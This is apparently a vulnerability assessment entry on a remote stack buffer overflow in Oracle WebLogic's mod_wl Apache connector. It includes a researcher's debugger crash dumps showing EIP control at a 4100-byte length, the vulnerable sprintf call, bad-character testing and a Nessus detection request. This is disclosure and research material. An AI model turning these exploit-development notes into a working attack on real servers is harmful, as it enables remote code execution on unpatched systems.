Oracle mod_wl HTTP POST Request Remote Buffer Overflow Vulnerability

Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after “POST /.jsp” in an HTTP request.

Recent assessments:

wchen-r7 at September 12, 2019 6:07pm UTC reported:

Details

Bea Weblogic 8.1 + Apache
<http://docs.oracle.com/cd/E13222_01/wls/docs81/plugins/apache.html&gt;

First crash

(328.c38): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\RPCRT4.dll -
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
eax=00000045 ebx=006a5d58 ecx=43434343 edx=7c90e4f4 esi=10013932 edi=000000a8
eip=77ea4126 esp=0280d7ec ebp=0280e818 iopl=0         ov up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010a03
RPCRT4!NdrVaryingArrayUnmarshall+0x81:
77ea4126 008945107416    add     byte ptr [ecx+16741045h],cl ds:0023:59b75388=??
0:132> .symfix
0:132> .reload
Reloading current modules
.............................................
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
0:132> kb
ChildEBP RetAddr  Args to Child
0280e818 10001a8a 006a5d58 006b8ce0 0280fa38 RPCRT4!NdrVaryingArrayUnmarshall+0x82
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll -
WARNING: Stack unwind information not available. Following frames may be wrong.
0280fef4 6ff0155f 006a5d58 006a1e28 006a5d58 mod_wl_20+0x1a8a
0280ff08 6ff018a9 006a5d58 006a5d58 00000000 libhttpd!ap_run_handler+0x1f
0280ff18 6ff0d97c 006a5d58 006a5d58 6ff097c6 libhttpd!ap_invoke_handler+0xa9
00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c

More controlled crash: length 4100

ChildEBP RetAddr  Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0440d7d4 41414141 54544820 2e312f50 000a0d31 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
0440e818 10001a8a 006a9388 0069cb20 0440fa38 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll -
0440fef4 6ff0155f 006a9388 0068dcf8 006a9388 mod_wl_20+0x1a8a
0440ff08 6ff018a9 006a9388 006a9388 00000000 libhttpd!ap_run_handler+0x1f
0440ff18 6ff0d97c 006a9388 006a9388 6ff097c6 libhttpd!ap_invoke_handler+0xa9
00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c

mod_wl detection via nessus

weblogic_mod_wl_overflow.nasl: “TITLE>Weblogic Bridge Message” >< res[2] ||

POST /index.jsp  HTTP/1.1
Host: 192.168.1.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: -1

TML>
<HEAD>
<TITLE>Weblogic Bridge Message
</TITLE>
</HEAD>
 <BODY>
<h2>Failure of server APACHE bridge:</h2><p>
<hr><pre>Internal Server failure, APACHE plugin.  Cannot continue.</pre>
<hr><br><b>Build date/time:</b> <i>Jun 16 2006 15:14:11</i>
<p><hr><b>Change Number:</b> <i>779586</i>
 &lt;/BODY&gt;
&lt;/HTML&gt;
&lt;HTML&gt;
&lt;HEAD&gt;
&lt;TITLE&gt;Weblogic Bridge Message

mod_wl overflow

.text:1000E751                 push    ecx             ; it should be HTTP/1.1 but.... failed :)
.text:1000E752                 push    edx
.text:1000E753                 mov     edx, [ebp+214h]
.text:1000E759                 push    edx
.text:1000E75A                 push    offset aSSS     ; "%s %s %s\r\n"
.text:1000E75F                 push    eax             ; Dest
.text:1000E760                 call    ds:sprintf      ; here is where overflow happends!

GET EIP on RET

0:244> p
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=1000edeb esp=0440c7b8 ebp=0440e818 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mod_wl_20+0xedeb:
1000edeb 81c41c100000    add     esp,101Ch
0:244> db esp
0440c7b8  1f 00 00 00 16 00 00 00-00 00 00 00 4a 01 00 00  ............J...
0440c7c8  48 6f 73 74 3a 20 31 39-32 2e 31 36 38 2e 31 2e  Host: 192.168.1.
0440c7d8  31 33 30 0d 0a 55 73 65-72 2d 41 67 65 6e 74 3a  130..User-Agent:
0440c7e8  20 4d 6f 7a 69 6c 6c 61-2f 34 2e 30 20 28 63 6f   Mozilla/4.0 (co
0440c7f8  6d 70 61 74 69 62 6c 65-3b 20 4d 53 49 45 20 36  mpatible; MSIE 6
0440c808  2e 30 3b 20 57 69 6e 64-6f 77 73 20 4e 54 20 35  .0; Windows NT 5
0440c818  2e 31 29 0d 0a 43 6f 6e-74 65 6e 74 2d 54 79 70  .1)..Content-Typ
0440c828  65 3a 20 61 70 70 6c 69-63 61 74 69 6f 6e 2f 78  e: application/x
0:244> p
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=1000edf1 esp=0440d7d4 ebp=0440e818 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
mod_wl_20+0xedf1:
1000edf1 c3              ret
0:244> db esp
0440d7d4  41 41 41 41 41 41 41 41-01 02 03 04 05 06 07 08  AAAAAAAA........
0440d7e4  09 0b 0c 0e 0f 10 11 12-13 14 15 16 17 18 19 1a  ................
0440d7f4  1b 1c 1d 1e 1f 20 21 22-23 24 25 26 27 28 29 2a  ..... !"#$%&'()*
0440d804  2b 2c 2d 2e 2f 30 31 32-33 34 35 36 37 38 39 3a  +,-./0123456789:
0440d814  3b 3c 3d 3e 40 41 42 43-44 45 46 47 48 49 4a 4b  ;<=>@ABCDEFGHIJK
0440d824  4c 4d 4e 4f 50 51 52 53-54 55 56 57 58 59 5a 5b  LMNOPQRSTUVWXYZ[
0440d834  5c 5d 5e 5f 60 61 62 63-64 65 66 67 68 69 6a 6b  \]^_`abcdefghijk
0440d844  6c 6d 6e 6f 70 71 72 73-74 75 76 77 78 79 7a 7b  lmnopqrstuvwxyz{
0:244> t
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=41414141 esp=0440d7d8 ebp=0440e818 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
41414141 ??              ???

References

<http://www.securityfocus.com/bid/30273/info&gt;

Assessed Attacker Value: 0
Assessed Attacker Value: 0Assessed Attacker Value: 0